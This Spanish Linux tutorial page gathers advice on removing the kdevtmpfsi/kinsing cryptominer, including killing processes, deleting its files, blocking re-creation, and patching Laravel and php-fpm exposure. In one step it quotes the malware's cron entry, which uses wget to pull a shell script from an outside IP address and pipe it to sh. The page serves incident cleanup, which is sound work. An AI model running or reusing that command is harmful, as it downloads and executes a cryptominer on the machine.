GNU/Linux >> Tutoriales Linux >  >> Linux

kdevtmpfsi usando toda la CPU

La solución mencionada aquí funcionó para nosotros. Básicamente, crea los archivos que usa el minero, sin ningún derecho, por lo que el minero no puede crearlos ni usarlos. https://github.com/docker-library/redis/issues/217

touch /tmp/kdevtmpfsi && touch /var/tmp/kinsing

echo "everything is good here" > /tmp/kdevtmpfsi

echo "everything is good here" > /var/tmp/kinsing

touch /tmp/zzz

echo "everything is good here" > /tmp/zzz

chmod go-rwx /var/tmp

chmod 1777 /tmp

Tuve el mismo problema con Laravel en Centos 8. Estos son los pasos que seguí para eliminar el malware y parchear el sistema.

Pasos para eliminar el malware del sistema:Paso 1:

Eliminar el malware:
Matar los dos procesos (kdevtmpfsi y kinsing -Pueden estar en el mismo nombre pero con caracteres aleatorios al final-) usando htop o cualquier otro gestor de procesos.

htop F3 para buscar servicios kdevtmpfsi y kinsing

Utilice lo siguiente para buscar y eliminar los archivos:

# find / -iname kdevtmpfsi* -exec rm -fv {} \;
# find / -iname kinsing* -exec rm -fv {} \;

La salida debería verse así:

removed '/tmp/kdevtmpfsi962782589'
removed '/tmp/kdevtmpfsi'
removed '/tmp/kinsing'
removed '/tmp/kinsing_oA1GECLm'

Paso 2:

Buscar un trabajo cron:
verifique si hay un trabajo cron que reinicializaría el malware.
Encontré el mío en:/var/spool/cron/apache>

UBUNTU /var/spool/cron/crontabs/www-data

Incluía lo siguiente:
* * * * * wget -q -O - http://195.3.146.118/lr.sh | sh > /dev/null 2>&1

Paso 3:

Cree nuevos archivos y hágalos de solo lectura: 

# touch /tmp/kdevtmpfsi && touch /tmp/kinsing
# echo "kdevtmpfsi is fine now" > /tmp/kdevtmpfsi
# echo "kinsing is fine now" > /tmp/kinsing
# chmod 0444 /tmp/kdevtmpfsi
# chmod 0444 /tmp/kinsing

Patching Laravel project:Paso 1:

Desactivar APP_DEBUG:
asegúrese de que el APP_DEBUG el atributo es false en .env porque así es como se accede a la vulnerabilidad.

Paso 2:

Actualizar encendido:
Actualizar encendido a una versión superior a 2.5.1 para asegurarse de que la vulnerabilidad está parcheada.
ejecute lo siguiente en la carpeta de su proyecto:

$ composer update facade/ignition

He tenido problemas con este minero durante algunos días y en mi caso fue el php-fpm:9000 puerto expuesto.
Supongo que es posible inyectar algo de código de forma remota de esta manera.

Entonces, si usa docker con php-fpm , NO correr su contenedor de esta manera:

docker run -v /www:/var/www -p 9000:9000 php:7.4

Eliminar la asignación de puertos:-p 9000:9000 .

No olvide reconstruir y reiniciar sus contenedores.

Más detalles aquí:https://github.com/laradock/laradock/issues/2451#issuecomment-577722571


Linux

  1. Solucionar problemas con el sistema de archivos proc en Linux

  2. Usando la fuerza en la línea de comando de Linux

  3. Usando la Interfaz Universal de Ajedrez

  4. Ejecutar una aplicación Qt en la web

  5. ¿Cuál es la sobrecarga de usar subcapas?

Cómo mostrar la información de la CPU de Linux usando CPUFetch

Aquí se explica cómo ver Netflix en Linux usando Firefox

Una forma sencilla de entender el comando IOStat

Tutorial sobre el uso del comando Timeout en Linux

Uso del sello de confianza de SiteLock

Uso de los tutoriales en video de cPanel